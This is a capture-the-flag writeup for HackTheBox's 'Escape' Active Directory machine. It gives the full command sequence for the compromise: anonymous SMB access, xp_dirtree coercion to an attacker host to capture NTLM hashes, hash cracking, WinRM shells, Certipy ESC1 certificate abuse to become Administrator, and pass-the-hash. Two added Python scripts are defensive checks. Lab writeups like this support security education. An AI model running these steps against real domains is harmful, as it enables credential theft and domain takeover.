Mystic

Escape Writeup - HackTheBox


Difficulty: Medium (Windows)

Escape is a Medium-rated Windows Active Directory machine on HackTheBox. It involves exploiting an openly accessible SMB share to discover database credentials, coercing NTLM authentication through MSSQL to capture service account hashes, pivoting through leaked credentials in log files, and abusing a misconfigured Active Directory Certificate Services (ADCS) template to escalate to Domain Admin.


Reconnaissance

Nmap Scan

A full TCP port scan reveals a Windows Domain Controller running typical AD services along with MSSQL and WinRM.

nmap -sCV -p- 10.129.6.224
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: sequel.htb)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sequel.htb)
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: sequel.htb)
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sequel.htb)
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp  open  mc-nmf        .NET Message Framing
49669/tcp open  msrpc         Microsoft Windows RPC
49689/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49690/tcp open  msrpc         Microsoft Windows RPC
49702/tcp open  msrpc         Microsoft Windows RPC
49713/tcp open  msrpc         Microsoft Windows RPC
49735/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows

Key observations:

  • Domain: sequel.htb with DC hostname dc.sequel.htb
  • Certificate Authority: sequel-DC-CA (visible in SSL cert issuer — important for later)
  • WinRM on port 5985 — useful for remote shell access
  • Clock skew: +8h00m00s from scanner time

SMB Enumeration

Anonymous access is allowed on the Public share, which contains a PDF with onboarding instructions.

smbclient //10.129.6.224/Public -U 'anonymous'
smb: \> dir
  .                                   D        0  Sat Nov 19 12:51:25 2022
  ..                                  D        0  Sat Nov 19 12:51:25 2022
  SQL Server Procedures.pdf           A    49551  Fri Nov 18 14:39:43 2022

smb: \> get "SQL Server Procedures.pdf"

The PDF contains MSSQL credentials for new hires:

User: PublicUser
Password: GuestUserCantWrite1
Authentication: SQL Server Authentication


Initial Foothold

MSSQL Enumeration

Connecting to the MSSQL instance with the discovered credentials:

impacket-mssqlclient [email protected] -p 'GuestUserCantWrite1'

Enumeration reveals limited privileges — no xp_cmdshell, no impersonation, no exploitable linked servers:

SQL (PublicUser  guest@master)> enum_db
name     is_trustworthy_on
------   -----------------
master                   0
tempdb                   0
model                    0
msdb                     1

SQL (PublicUser  guest@master)> xp_cmdshell
ERROR: The EXECUTE permission was denied on the object 'xp_cmdshell'

SQL (PublicUser  guest@master)> enum_impersonate
execute as   database   permission_name   state_desc   grantee   grantor
----------   --------   ---------------   ----------   -------   -------

However, xp_dirtree can be executed. Given a UNC path, it makes the SQL Server service account reach out over SMB to that host, so the service account's NTLM authentication can be captured.

NTLM Hash Capture via xp_dirtree

Start Responder on the attacker machine to capture the authentication attempt:

sudo responder -I tun0

Force the MSSQL service to authenticate to the attacker:

xp_dirtree \\10.10.15.45\share

Responder captures the NTLMv2 hash for the sql_svc service account:

sql_svc::sequel:78c5ef5996976067:7F52358E3B71CDB78CE132AB4B53EB91:0101000000000000...

Cracking the Hash

hashcat -m 5600 sql_svc.hash rockyou.txt

Result: sql_svc:REGGIE1234ronnie

Shell as sql_svc

evil-winrm -i sequel.htb -u sql_svc -p REGGIE1234ronnie

No user flag in sql_svc's directories — the flag belongs to Ryan.Cooper.


Lateral Movement

Credential Discovery in MSSQL Error Logs

Checking the MSSQL error log backup reveals a failed login attempt where Ryan.Cooper accidentally typed their password as the username:

type C:\SQLServer\Logs\ERRORLOG.bak
2022-11-18 13:43:07.44 Logon  Logon failed for user 'sequel.htb\Ryan.Cooper'. 
    Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.48 Logon  Logon failed for user 'NuclearMosquito3'. 
    Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]

The second failed login shows Ryan.Cooper entered their password NuclearMosquito3 as the username.
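A defender-side triage check for exactly this log pattern, added here as an example (not part of the original writeup): it parses SQL Server ERRORLOG "Logon failed" entries and flags a failed domain logon that is followed, from the same client within a few seconds, by a failed logon whose "user" is not an account at all. The sample log lines are constructed from the excerpt above; the 5-second window and the known-SQL-login list are assumptions.

```python
import re
from datetime import datetime, timedelta

# A "Logon failed" entry as SQL Server writes it to ERRORLOG (one line; the writeup shows it wrapped).
LOGON_FAIL_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d+)\s+Logon\s+"
    r"Logon failed for user '(?P<user>[^']*)'.*\[CLIENT: (?P<client>[^\]]+)\]"
)

def parse_failed_logons(lines):
    """Return (timestamp, user, client) per failed logon, re-joining indented continuation lines."""
    entries = []
    for line in lines:
        if line[:1].isspace() and entries:
            entries[-1] += " " + line.strip()      # continuation of the previous entry
        else:
            entries.append(line.rstrip())
    events = []
    for entry in entries:
        m = LOGON_FAIL_RE.match(entry)
        if m:
            ts = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S.%f")
            events.append((ts, m["user"], m["client"]))
    return events

def looks_like_account(name, known_sql_logins=frozenset({"sa"})):
    """DOMAIN\\user, user@domain or a known SQL login (assumed list); anything else is suspect."""
    return "\\" in name or "@" in name or name in known_sql_logins

def find_password_as_username(lines, window=timedelta(seconds=5)):
    """Flag a failed domain logon followed, from the same client within `window`, by a failed
    logon whose 'user' is not an account. Only the suspect string's length is reported."""
    findings = []
    events = parse_failed_logons(lines)
    for (t1, u1, c1), (t2, u2, c2) in zip(events, events[1:]):
        if (looks_like_account(u1) and not looks_like_account(u2)
                and c1 == c2 and timedelta(0) <= t2 - t1 <= window):
            findings.append({"account": u1, "client": c1,
                             "at": t2.isoformat(), "suspect_len": len(u2)})
    return findings

# Constructed sample mirroring the ERRORLOG.bak excerpt in the writeup, plus one unrelated failure.
SAMPLE_ERRORLOG = """\
2022-11-18 13:43:07.44 Logon  Logon failed for user 'sequel.htb\\Ryan.Cooper'.
    Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.48 Logon  Logon failed for user 'NuclearMosquito3'.
    Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:50:01.10 Logon  Logon failed for user 'sa'.
    Reason: Password did not match that for the login provided. [CLIENT: 10.0.0.7]
""".splitlines()
```

Run `find_password_as_username(open("ERRORLOG").read().splitlines())` over a real log; each finding names the account whose password should be rotated and the log line to scrub, without echoing the secret.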

Shell as Ryan.Cooper

evil-winrm -i sequel.htb -u ryan.cooper -p NuclearMosquito3
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop> type user.txt
a496dbca697c90710dd196fbc706xxxx

Privilege Escalation

ADCS Enumeration — ESC1

Recall from reconnaissance that the SSL certificate issuer was sequel-DC-CA. This hints at Active Directory Certificate Services. Using Certipy to enumerate vulnerable templates:

certipy-ad find -u [email protected] -p NuclearMosquito3 -dc-ip 10.129.6.224 -vulnerable

A vulnerable template UserAuthentication is found with the ESC1 misconfiguration:

[!] Vulnerable Certificates Templates :
    CA Name               : dc.sequel.htb\sequel-DC-CA
    Template Name         : UserAuthentication
    msPKI-Certificate-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
    Enrollment Rights     : sequel\Domain Users

The critical conditions for ESC1 are met:

  • ENROLLEE_SUPPLIES_SUBJECT — the requester can specify any Subject Alternative Name (SAN)
  • Domain Users have enrollment rights — Ryan.Cooper can request certificates
  • Client Authentication EKU — the certificate can be used for authentication
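An audit check for these conditions, added here as an example (not part of the original writeup or of Certipy): it evaluates a template description against the ESC1 preconditions and shows the same template after remediation. The template records are constructed (not Certipy's output format); the manager-approval and authorized-signature values are assumed, since the writeup does not show them, and the hardened variant's settings are a suggested fix, not something from the page.

```python
# EKU OIDs that let a certificate be used for domain authentication (PKINIT/Schannel).
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "2.5.29.37.0",             # Any Purpose
}
# Groups whose enrollment right means effectively any domain principal can enrol.
BROAD_ENROLLERS = {"Domain Users", "Domain Computers", "Authenticated Users", "Everyone"}

def esc1_conditions(template):
    """Evaluate each ESC1 precondition for one template description (dict).
    All true means a low-privileged user can request a certificate with a SAN
    of their choosing and then authenticate as that identity."""
    ekus = set(template["ekus"])
    enrollers = {p.split("\\")[-1] for p in template["enrollment_rights"]}
    return {
        "enrollee_supplies_subject": "ENROLLEE_SUPPLIES_SUBJECT" in template["name_flags"],
        "client_auth_eku": not ekus or bool(ekus & AUTH_EKUS),  # empty EKU list = any use
        "broad_enrollment": bool(enrollers & BROAD_ENROLLERS),
        "no_manager_approval": not template.get("manager_approval", False),
        "no_authorized_signatures": template.get("authorized_signatures", 0) == 0,
    }

def is_esc1(template):
    return all(esc1_conditions(template).values())

# Constructed template record mirroring the writeup's findings for UserAuthentication.
USER_AUTH_TEMPLATE = {
    "name": "UserAuthentication",
    "name_flags": ["ENROLLEE_SUPPLIES_SUBJECT"],
    "ekus": ["1.3.6.1.5.5.7.3.2"],
    "enrollment_rights": ["sequel\\Domain Users"],
    "manager_approval": False,      # assumed: not shown in the writeup
    "authorized_signatures": 0,     # assumed: not shown in the writeup
}
# Suggested remediation: the SAN is built from the requester's AD object
# (SUBJECT_ALT_REQUIRE_UPN) instead of the CSR, and issuance needs manager approval.
HARDENED_TEMPLATE = dict(
    USER_AUTH_TEMPLATE,
    name_flags=["SUBJECT_ALT_REQUIRE_UPN"],
    manager_approval=True,
)

if __name__ == "__main__":
    for tpl in (USER_AUTH_TEMPLATE, HARDENED_TEMPLATE):
        met = [k for k, v in esc1_conditions(tpl).items() if v]
        print(tpl["name"], "ESC1" if is_esc1(tpl) else "ok", met)
```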

Exploiting ESC1

Request a certificate as Administrator by specifying the UPN in the SAN:

certipy-ad req -u [email protected] -p NuclearMosquito3 \
  -ca sequel-DC-CA \
  -template UserAuthentication \
  -upn [email protected] \
  -dc-ip 10.129.6.224

This produces administrator.pfx.

Authentication with Certificate

Before authenticating, the system clock must be synced with the DC to avoid Kerberos clock skew errors:

sudo timedatectl set-ntp false
sudo ntpdate 10.129.6.224

Authenticate using the certificate to retrieve the Administrator's NT hash:

certipy-ad auth -pfx administrator.pfx -dc-ip 10.129.6.224
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Got hash for '[email protected]': aad3b435b51404eeaad3b435b51404ee:a52f78e4c751e5f5e17e1e9f3e58f4ee

Shell as Administrator

Pass-the-hash with the NT hash (second half only):

evil-winrm -i sequel.htb -u administrator -H a52f78e4c751e5f5e17e1e9f3e58f4ee
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
a5e74248ddd03b579b8519bec696xxxx

Flags

Flag   Hash
----   --------------------------------
User   a496dbca697c90710dd196fbc706xxxx
Root   a5e74248ddd03b579b8519bec696xxxx

Attack Path Summary

Nmap → AD Domain Controller (sequel.htb), SMB, MSSQL, WinRM, ADCS (sequel-DC-CA)
  → SMB anonymous access → Public share → "SQL Server Procedures.pdf"
    → MSSQL creds: PublicUser / GuestUserCantWrite1
      → xp_dirtree UNC path → Responder captures NTLMv2 hash (sql_svc)
        → hashcat → REGGIE1234ronnie → WinRM as sql_svc
          → ERRORLOG.bak leaks Ryan.Cooper's password: NuclearMosquito3
            → WinRM as Ryan.Cooper → user.txt
              → ADCS ESC1 (UserAuthentication template, ENROLLEE_SUPPLIES_SUBJECT)
                → certipy-ad req as Administrator → PFX → NT hash via PKINIT
                  → Pass-the-Hash → WinRM as Administrator → root.txt